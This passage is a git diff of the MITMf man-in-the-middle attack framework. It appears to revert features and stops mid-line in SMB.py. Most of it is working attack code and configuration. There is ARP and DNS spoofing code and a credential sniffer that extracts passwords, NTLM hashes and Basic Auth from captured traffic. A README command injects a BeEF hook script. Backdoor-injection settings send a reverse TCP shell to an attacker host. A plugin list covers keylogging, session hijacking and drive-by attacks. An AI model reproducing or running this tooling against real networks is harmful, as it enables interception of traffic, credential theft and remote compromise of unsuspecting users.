diff --git a/.coveragerc b/.coveragerc deleted file mode 100644 index 2a138cb..0000000 --- a/.coveragerc +++ /dev/null @@ -1,8 +0,0 @@ -[run] -branch = True - -[report] -include = *core*, *libs*, *plugins* -exclude_lines = - pragma: nocover - pragma: no cover diff --git a/.gitignore b/.gitignore index acdb2f6..0860090 100644 --- a/.gitignore +++ b/.gitignore @@ -57,7 +57,3 @@ docs/_build/ # PyBuilder target/ - -# OSX Stuff -.DS_Store -._.DS_Store diff --git a/.travis.yml b/.travis.yml index 1656a7a..8d2267b 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,27 +1,11 @@ language: python python: - "2.7" - -addons: - apt: - packages: - - libpcap0.8-dev - - libnetfilter-queue-dev - - libssl-dev - -notifications: - irc: - channels: - - "irc.freenode.org#MITMf" - template: - - "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}" - skip_join: true - use_notice: true +sudo: required +before_install: + - "ifconfig" + - "sudo apt-get update -qq" + - "sudo apt-get install tcpdump libpcap0.8-dev libnetfilter-queue-dev libssl-dev" install: "pip install -r requirements.txt" -before_script: - - "pip install python-coveralls" -script: - - "nosetests --with-cov" -after_success: - - coveralls +script: nosetests \ No newline at end of file diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md index d0f9f61..117d02f 100644 --- a/CONTRIBUTORS.md +++ b/CONTRIBUTORS.md @@ -1,4 +1,4 @@ -# Intentional contributors (in no particular order) +#Intentional contributors (in no particular order) - @rthijssen - @ivangr0zni (Twitter) @@ -13,7 +13,7 @@ - @auraltension - @HAMIDx9 -# Unintentional contributors and/or projects that I stole code from +#Unintentional contributors and/or projects that I stole code from - Metasploit Framework's os.js and Javascript Keylogger module - Responder by Laurent Gaffie diff --git a/README.md b/README.md old mode 100755 new mode 100644 index 2b60ea0..a52fb9a --- a/README.md +++ b/README.md @@ -3,14 +3,11 @@ ![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg) [![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf) [![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf) -[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master&service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master) -# MITMf +#MITMf Framework for Man-In-The-Middle attacks -**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.** - Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project. @@ -18,7 +15,7 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox Contact me at: - Twitter: @byt3bl33d3r - IRC on Freenode: #MITMf -- Email: byt3bl33d3r@protonmail.com +- Email: byt3bl33d3r@gmail.com **Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .** @@ -114,33 +111,13 @@ Inject a JS script: ```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js``` -Start a captive portal that redirects everything to http://SERVER/PATH: - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH``` - -Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder: - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive``` - -Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof): - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns``` - -Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config): - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR``` - -Same as above but with hostname: - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns``` - And much much more! Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..) For a complete list of available options, just run ```python mitmf.py --help``` -# Currently available plugins +#Currently available plugins - **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application - **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients @@ -150,22 +127,12 @@ For a complete list of available options, just run ```python mitmf.py --help``` - **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing - **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type - **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks -- **Ferret-NG** : Transparently hijacks client sessions +- **Ferret-NG** : Transperently hijacks client sessions - **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients - **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy - **Inject** : Inject arbitrary content into HTML content - **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins - **JSkeylogger** : Injects a Javascript keylogger into a client's webpages -- **Replace** : Replace arbitrary content in HTML content +- **Replace** : Replace arbitary content in HTML content - **SMBAuth** : Evoke SMB challenge-response authentication attempts - **Upsidedownternet** : Flips images 180 degrees -- **Captive** : Creates a captive portal, redirecting HTTP requests using 302 - -# How to fund my tea & sushi reserve - -BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU - -ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee - -LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr - diff --git a/config/captive/portal.html b/config/captive/portal.html deleted file mode 100755 index 80b0cac..0000000 --- a/config/captive/portal.html +++ /dev/null @@ -1,31 +0,0 @@ - - -Captive Portal - - - - -
-
-
Client Required
- -
- -
- - - diff --git a/config/mitmf.conf b/config/mitmf.conf old mode 100755 new mode 100644 index 1e78825..6832dce --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -38,7 +38,6 @@ [[[A]]] # Queries for IPv4 address records *.thesprawl.org=192.168.178.27 - *.captive.portal=192.168.1.100 [[[AAAA]]] # Queries for IPv6 address records *.thesprawl.org=2001:db8::1 @@ -76,19 +75,11 @@ # # Plugin configuration starts here # -[Captive] - - # Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server) - Port = 8080 - ServerString = "Captive Server 1.0" - - # Set the filename served as /CaptivePortal.exe by integrated http server - PayloadFilename = config/captive/calc.exe [Replace] [[Regex1]] - 'Google Search' = '44CON' + 'Google Search' = 'Google yssas' [[Regex2]] "I'm Feeling Lucky" = "I'm Feeling Something In My Pants" @@ -98,7 +89,7 @@ # Here you can specify the client to hijack sessions from # - Client = '10.0.237.91' + Client = '192.168.1.26' [SSLstrip+] @@ -454,10 +445,10 @@ PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND # PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke PATCH_METHOD = automatic - HOST = 192.168.20.79 + HOST = 192.168.1.16 PORT = 8090 # SHELL for use with automatic PATCH_METHOD - SHELL = iat_reverse_tcp_stager_threaded + SHELL = iat_reverse_tcp_inline_threaded # SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload SUPPLIED_SHELLCODE = None ZERO_CERT = True @@ -512,7 +503,7 @@ LinuxType = None WindowsType = ALL CompressedFiles = False - #inherits WindowsIntelx86 from ALL + #inherits WindowsIntelx32 from ALL [[[[WindowsIntelx86]]]] PATCH_DLL = False ZERO_CERT = True diff --git a/core/banners.py b/core/banners.py index a463ffa..51438c8 100644 --- a/core/banners.py +++ b/core/banners.py @@ -65,18 +65,6 @@ banner4 = """ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ """ -banner5 = """ -@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@ -@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@ -@@! @@! @@! @@! @@! @@! @@! @@! @@! -!@! !@! !@! !@! !@! !@! !@! !@! !@! -@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:! -!@! ! !@! !!! !!! !@! ! !@! !!!!!: -!!: !!: !!: !!: !!: !!: !!: -:!: :!: :!: :!: :!: :!: :!: -::: :: :: :: ::: :: :: - : : : : : : : -""" - def get_banner(): - return random.choice([banner1, banner2, banner3, banner4, banner5]) + banners = [banner1, banner2, banner3, banner4] + return random.choice(banners) diff --git a/core/beefapi.py b/core/beefapi.py index e427619..7a66797 100644 --- a/core/beefapi.py +++ b/core/beefapi.py @@ -342,12 +342,6 @@ class Session(object): logs.append(Log(log)) return logs - def update(self, options={}): - headers = {"Content-Type": "application/json", "charset": "UTF-8"} - payload = json.dumps(options) - r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload) - return r.json() - def run(self, module_id, options={}): headers = {"Content-Type": "application/json", "charset": "UTF-8"} payload = json.dumps(options) diff --git a/core/configwatcher.py b/core/configwatcher.py index 95716de..7f7b955 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -21,7 +21,7 @@ import pyinotify import threading from configobj import ConfigObj -class ConfigWatcher(pyinotify.ProcessEvent, object): +class ConfigWatcher(pyinotify.ProcessEvent): @property def config(self): diff --git a/core/ferretng/ServerConnection.py b/core/ferretng/ServerConnection.py index f35fe2b..5cd085d 100644 --- a/core/ferretng/ServerConnection.py +++ b/core/ferretng/ServerConnection.py @@ -110,7 +110,7 @@ class ServerConnection(HTTPClient): self.isCompressed = True elif (key.lower()== 'strict-transport-security'): - log.debug("[ServerConnection] Zapped a strict-transport-security header") + log.debug("[ServerConnection] Zapped a strict-trasport-security header") elif (key.lower() == 'content-length'): self.contentLength = value diff --git a/core/mitmfapi.py b/core/mitmfapi.py index 195b8d2..710ae98 100644 --- a/core/mitmfapi.py +++ b/core/mitmfapi.py @@ -75,13 +75,13 @@ class mitmfapi(ConfigWatcher): if status == "1": for p in ProxyPlugins().all_plugins: if (p.name == plugin) and (p not in ProxyPlugins().plugin_list): - ProxyPlugins().add_plugin(p) + ProxyPlugins().addPlugin(p) return json.dumps({"plugin": plugin, "response": "success"}) elif status == "0": for p in ProxyPlugins().plugin_list: if p.name == plugin: - ProxyPlugins().remove_plugin(p) + ProxyPlugins().removePlugin(p) return json.dumps({"plugin": plugin, "response": "success"}) return json.dumps({"plugin": plugin, "response": "failed"}) @@ -97,4 +97,4 @@ class mitmfapi(ConfigWatcher): def start(self): api_thread = threading.Thread(name='mitmfapi', target=self.startFlask) api_thread.setDaemon(True) - api_thread.start() + api_thread.start() \ No newline at end of file diff --git a/core/netcreds.py b/core/netcreds.py index 5518852..5daa6b8 100644 --- a/core/netcreds.py +++ b/core/netcreds.py @@ -41,8 +41,6 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' # Prone to false+ but prefer that to false- http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))' -parsing_pcap = False - class NetCreds: version = "1.0" @@ -53,64 +51,15 @@ class NetCreds: except Exception as e: if "Interrupted system call" in e: pass - def start(self, interface, ip): - t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) - t.setDaemon(True) - t.start() - - def parse_pcap(self, pcap): - parsing_pcap=True - - for pkt in PcapReader(pcap): - pkt_parser(pkt) - - sys.exit() - -def frag_remover(ack, load): - ''' - Keep the FILO OrderedDict of frag loads from getting too large - 3 points of limit: - Number of ip_ports < 50 - Number of acks per ip:port < 25 - Number of chars in load < 5000 - ''' - global pkt_frag_loads - - # Keep the number of IP:port mappings below 50 - # last=False pops the oldest item rather than the latest - while len(pkt_frag_loads) > 50: - pkt_frag_loads.popitem(last=False) - - # Loop through a deep copy dict but modify the original dict - copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - if len(copy_pkt_frag_loads[ip_port]) > 0: - # Keep 25 ack:load's per ip:port - while len(copy_pkt_frag_loads[ip_port]) > 25: - pkt_frag_loads[ip_port].popitem(last=False) - - # Recopy the new dict to prevent KeyErrors for modifying dict in loop - copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - # Keep the load less than 75,000 chars - for ack in copy_pkt_frag_loads[ip_port]: - # If load > 5000 chars, just keep the last 200 chars - if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: - pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] - -def frag_joiner(ack, src_ip_port, load): - ''' - Keep a store of previous fragments in an OrderedDict named pkt_frag_loads - ''' - for ip_port in pkt_frag_loads: - if src_ip_port == ip_port: - if ack in pkt_frag_loads[src_ip_port]: - # Make pkt_frag_loads[src_ip_port][ack] = full load - old_load = pkt_frag_loads[src_ip_port][ack] - concat_load = old_load + load - return OrderedDict([(ack, concat_load)]) - - return OrderedDict([(ack, load)]) + def start(self, interface, ip, pcap): + if pcap: + for pkt in PcapReader(pcap): + pkt_parser(pkt) + sys.exit() + else: + t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) + t.setDaemon(True) + t.start() def pkt_parser(pkt): ''' @@ -178,7 +127,53 @@ def pkt_parser(pkt): telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) # HTTP and other protocols that run on TCP + a raw load - other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True) + other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) + +def frag_remover(ack, load): + ''' + Keep the FILO OrderedDict of frag loads from getting too large + 3 points of limit: + Number of ip_ports < 50 + Number of acks per ip:port < 25 + Number of chars in load < 5000 + ''' + global pkt_frag_loads + + # Keep the number of IP:port mappings below 50 + # last=False pops the oldest item rather than the latest + while len(pkt_frag_loads) > 50: + pkt_frag_loads.popitem(last=False) + + # Loop through a deep copy dict but modify the original dict + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + if len(copy_pkt_frag_loads[ip_port]) > 0: + # Keep 25 ack:load's per ip:port + while len(copy_pkt_frag_loads[ip_port]) > 25: + pkt_frag_loads[ip_port].popitem(last=False) + + # Recopy the new dict to prevent KeyErrors for modifying dict in loop + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + # Keep the load less than 75,000 chars + for ack in copy_pkt_frag_loads[ip_port]: + # If load > 5000 chars, just keep the last 200 chars + if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: + pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] + +def frag_joiner(ack, src_ip_port, load): + ''' + Keep a store of previous fragments in an OrderedDict named pkt_frag_loads + ''' + for ip_port in pkt_frag_loads: + if src_ip_port == ip_port: + if ack in pkt_frag_loads[src_ip_port]: + # Make pkt_frag_loads[src_ip_port][ack] = full load + old_load = pkt_frag_loads[src_ip_port][ack] + concat_load = old_load + load + return OrderedDict([(ack, concat_load)]) + + return OrderedDict([(ack, load)]) def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq): ''' @@ -535,14 +530,14 @@ def irc_logins(full_load, pkt): msg = 'IRC pass: %s' % pass_search2.group(1) return msg -def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose): +def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): ''' Pull out pertinent info from the parsed HTTP packet data ''' user_passwd = None http_url_req = None method = None - http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] + http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] http_line, header_lines, body = parse_http_load(full_load, http_methods) headers = headers_to_dict(header_lines) if 'host' in headers: @@ -550,51 +545,44 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose): else: host = '' - if parsing_pcap is True: + #if http_line != None: + # method, path = parse_http_line(http_line, http_methods) + # http_url_req = get_http_url(method, host, path, headers) + #if http_url_req != None: + #printer(src_ip_port, None, http_url_req) - if http_line != None: - method, path = parse_http_line(http_line, http_methods) - http_url_req = get_http_url(method, host, path, headers) - if http_url_req != None: - if verbose == False: - if len(http_url_req) > 98: - http_url_req = http_url_req[:99] + '...' - printer(src_ip_port, None, http_url_req) + # Print search terms + searched = get_http_searches(http_url_req, body, host) + if searched: + printer(src_ip_port, dst_ip_port, searched) - # Print search terms - searched = get_http_searches(http_url_req, body, host) - if searched: - printer(src_ip_port, dst_ip_port, searched) + #We dont need this cause its being taking care of by the proxy + + #Print user/pwds + #if body != '': + # user_passwd = get_login_pass(body) + # if user_passwd != None: + # try: + # http_user = user_passwd[0].decode('utf8') + # http_pass = user_passwd[1].decode('utf8') + # # Set a limit on how long they can be prevent false+ + # if len(http_user) > 75 or len(http_pass) > 75: + # return + # user_msg = 'HTTP username: %s' % http_user + # printer(src_ip_port, dst_ip_port, user_msg) + # pass_msg = 'HTTP password: %s' % http_pass + # printer(src_ip_port, dst_ip_port, pass_msg) + # except UnicodeDecodeError: + # pass - # Print user/pwds - if body != '': - user_passwd = get_login_pass(body) - if user_passwd != None: - try: - http_user = user_passwd[0].decode('utf8') - http_pass = user_passwd[1].decode('utf8') - # Set a limit on how long they can be prevent false+ - if len(http_user) > 75 or len(http_pass) > 75: - return - user_msg = 'HTTP username: %s' % http_user - printer(src_ip_port, dst_ip_port, user_msg) - pass_msg = 'HTTP password: %s' % http_pass - printer(src_ip_port, dst_ip_port, pass_msg) - except UnicodeDecodeError: - pass - - # Print POST loads - # ocsp is a common SSL post load that's never interesting - if method == 'POST' and 'ocsp.' not in host: - try: - if verbose == False and len(body) > 99: - # If it can't decode to utf8 we're probably not interested in it - msg = 'POST load: %s...' % body[:99].encode('utf8') - else: - msg = 'POST load: %s' % body.encode('utf8') - printer(src_ip_port, None, msg) - except UnicodeDecodeError: - pass + # Print POST loads + # ocsp is a common SSL post load that's never interesting + #if method == 'POST' and 'ocsp.' not in host: + # try: + # msg = 'POST load: %s' % body.encode('utf8') + # printer(src_ip_port, None, msg) + # except UnicodeDecodeError: + # pass # Kerberos over TCP decoded = Decode_Ip_Packet(str(pkt)[14:]) @@ -674,10 +662,7 @@ def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header): b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE) if b64_auth_re != None: basic_auth_b64 = b64_auth_re.group(1) - try: - basic_auth_creds = base64.decodestring(basic_auth_b64) - except Exception: - return + basic_auth_creds = base64.decodestring(basic_auth_b64) msg = 'Basic Authentication: %s' % basic_auth_creds printer(src_ip_port, dst_ip_port, msg) @@ -728,13 +713,15 @@ def headers_to_dict(header_lines): Convert the list of header lines into a dictionary ''' headers = {} - for line in header_lines: - lineList=line.split(': ', 1) - key=lineList[0].lower() - if len(lineList)>1: - headers[key]=lineList[1] - else: - headers[key]="" + # Incomprehensible list comprehension flattens list of headers + # that are each split at ': ' + # http://stackoverflow.com/a/406296 + headers_list = [x for line in header_lines for x in line.split(': ', 1)] + headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) + # Make the header key (like "Content-Length") lowercase + for header in headers_dict: + headers[header.lower()] = headers_dict[header] + return headers def parse_http_line(http_line, http_methods): @@ -807,12 +794,9 @@ def parse_netntlm_chal(headers, chal_header, ack): header_val2 = header_val2.split(' ', 1) # The header value can either start with NTLM or Negotiate if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': - try: - msg2 = header_val2[1] - except IndexError: - return + msg2 = header_val2[1] msg2 = base64.decodestring(msg2) - parse_ntlm_chal(msg2, ack) + parse_ntlm_chal(ack, msg2) def parse_ntlm_chal(msg2, ack): ''' @@ -901,10 +885,10 @@ def get_login_pass(body): 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', - 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario'] + 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' - 'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena'] + 'passwort', 'passwrd', 'wppassword', 'upasswd'] for login in userfields: login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE) diff --git a/core/packetfilter.py b/core/packetfilter.py index cd4ad09..e8f0d5d 100644 --- a/core/packetfilter.py +++ b/core/packetfilter.py @@ -1,3 +1,5 @@ +import threading + from core.utils import set_ip_forwarding, iptables from core.logger import logger from scapy.all import * @@ -17,21 +19,22 @@ class PacketFilter: iptables().NFQUEUE() self.nfqueue = NetfilterQueue() - self.nfqueue.bind(0, self.modify) + self.nfqueue.bind(1, self.modify) - self.nfqueue.run() + t = threading.Thread(name='packetparser', target=self.nfqueue.run) + t.setDaemon(True) + t.start() def modify(self, pkt): #log.debug("Got packet") data = pkt.get_payload() packet = IP(data) - for filter in self.filter: - try: - execfile(filter) - except Exception: - log.debug("Error occurred in filter", filter) - print_exc() + try: + execfile(self.filter) + except Exception: + log.debug("Error occurred in filter") + print_exc() pkt.set_payload(str(packet)) #set the packet content to our modified version pkt.accept() #accept the packet @@ -39,4 +42,4 @@ class PacketFilter: def stop(self): self.nfqueue.unbind() set_ip_forwarding(0) - iptables().flush() + iptables().flush() \ No newline at end of file diff --git a/core/poisoners/ARP.py b/core/poisoners/ARP.py index a70af0f..24e0b0f 100644 --- a/core/poisoners/ARP.py +++ b/core/poisoners/ARP.py @@ -214,8 +214,8 @@ class ARPpoisoner: if targetmac is not None: try: #log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip)) - self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode)) - self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode)) + self.s.send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode)) + self.s.send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode)) except Exception as e: if "Interrupted system call" not in e: log.error("Exception occurred while poisoning {}: {}".format(targetip, e)) @@ -242,8 +242,8 @@ class ARPpoisoner: log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) try: for i in range(0, count): - self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac)) - self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac)) + self.s.send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac)) + self.s.send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac)) except Exception as e: if "Interrupted system call" not in e: log.error("Exception occurred while poisoning {}: {}".format(targetip, e)) diff --git a/core/poisoners/DHCP.py b/core/poisoners/DHCP.py index b46cf54..cd6ff20 100644 --- a/core/poisoners/DHCP.py +++ b/core/poisoners/DHCP.py @@ -79,7 +79,7 @@ class DHCPpoisoner(): return 'stored', client_ip net = IPNetwork(self.ip_address + '/24') - return 'generated', str(random.choice(list(net))) + return 'generated', random.choice(list(net)) def dhcp_callback(self, resp): if resp.haslayer(DHCP): diff --git a/core/proxyplugins.py b/core/proxyplugins.py index ff4390e..efb1833 100644 --- a/core/proxyplugins.py +++ b/core/proxyplugins.py @@ -82,10 +82,7 @@ class ProxyPlugins: self.plugin_list.remove(p) log.debug("Removing {} plugin".format(p.name)) for mthd,pmthd in self.mthdDict.iteritems(): - try: - self.plugin_mthds[mthd].remove(getattr(p,pmthd)) - except KeyError: - pass #nothing to remove + self.plugin_mthds[mthd].remove(p) def hook(self): '''Magic to hook various function calls in sslstrip''' @@ -111,10 +108,9 @@ class ProxyPlugins: log.debug("hooking {}()".format(fname)) #calls any plugin that has this hook try: - if self.plugin_mthds: - for f in self.plugin_mthds[fname]: - a = f(**args) - if a != None: args = a + for f in self.plugin_mthds[fname]: + a = f(**args) + if a != None: args = a except Exception as e: #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating) log.error("Exception occurred in hooked function") diff --git a/core/servers/DNS.py b/core/servers/DNS.py index 0599e7b..54f1889 100755 --- a/core/servers/DNS.py +++ b/core/servers/DNS.py @@ -48,12 +48,6 @@ from IPy import IP formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") log = logger().setup_logger("DNSChef", formatter) -dnslog = logging.getLogger('dnslog') -handler = logging.FileHandler('./logs/dns/dns.log',) -handler.setFormatter(formatter) -dnslog.addHandler(handler) -dnslog.setLevel(logging.INFO) - # DNSHandler Mixin. The class contains generic functions to parse DNS requests and # calculate an appropriate response based on user parameters. class DNSHandler(): @@ -75,7 +69,6 @@ class DNSHandler(): except Exception as e: log.info("Error: invalid DNS request", extra=clientip) - dnslog.info("Error: invalid DNS request", extra=clientip) else: # Only Process DNS Queries @@ -120,7 +113,6 @@ class DNSHandler(): response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip) - dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip) # IPv6 needs additional work before inclusion: if qtype == "AAAA": @@ -190,7 +182,6 @@ class DNSHandler(): elif qtype == "*" and not None in fake_records.values(): log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip) - dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q) @@ -266,7 +257,6 @@ class DNSHandler(): # Proxy the request else: log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip) - dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip) nameserver_tuple = random.choice(nameservers).split('#') response = self.proxyrequest(data, *nameserver_tuple) @@ -349,7 +339,6 @@ class DNSHandler(): except Exception as e: log.warning("Could not proxy request: {}".format(e), extra=clientip) - dnslog.info("Could not proxy request: {}".format(e), extra=clientip) else: return reply @@ -357,7 +346,6 @@ class DNSHandler(): clientip = {'clientip': self.client_address[0]} log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip) - dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) @@ -366,8 +354,7 @@ class DNSHandler(): #First proxy the request with the real domain q = DNSRecord.question(real_domain).pack() r = self.proxyrequest(q, *nameserver_tuple) - if r is None: return None - + #Parse the answer dns_rr = DNSRecord.parse(r).rr @@ -462,12 +449,7 @@ class DNSChef(ConfigWatcher): # Use alternative DNS servers if config['nameservers']: - self.nameservers = [] - - if type(config['nameservers']) is str: - self.nameservers.append(config['nameservers']) - elif type(config['nameservers']) is list: - self.nameservers = config['nameservers'] + self.nameservers = config['nameservers'].split(',') for section in config.sections: diff --git a/core/servers/HTTP.py b/core/servers/HTTP.py index 75d0c1d..82296eb 100644 --- a/core/servers/HTTP.py +++ b/core/servers/HTTP.py @@ -49,10 +49,10 @@ class HTTP: def start(self): try: - #if OsInterfaceIsSupported(): - #server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1) - #else: - server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1) + if OsInterfaceIsSupported(): + server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1) + else: + server = ThreadingTCPServer(('', 80), HTTP1) t = threading.Thread(name='HTTP', target=server.serve_forever) t.setDaemon(True) @@ -267,7 +267,7 @@ def PacketSequence(data, client): else: Response = IIS_Auth_401_Ans() if settings.Config.Verbose: - log.info("{} [HTTP] Sending NTLM authentication request".format(client)) + log.info("{} [HTTP] Sending NTLM authentication request to".format(client)) return str(Response) diff --git a/core/servers/SMB.py b/core/servers/SMB.py index cac8027..198ba4d 100644 --- a/core/servers/SMB.py +++ b/core/servers/SMB.py @@ -28,12 +28,12 @@ class SMB: def start(self): try: - #if OsInterfaceIsSupported(): - # server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1) - # server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1) - #else: - server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1) - server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1) + if OsInterfaceIsSupported(): + server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1) + 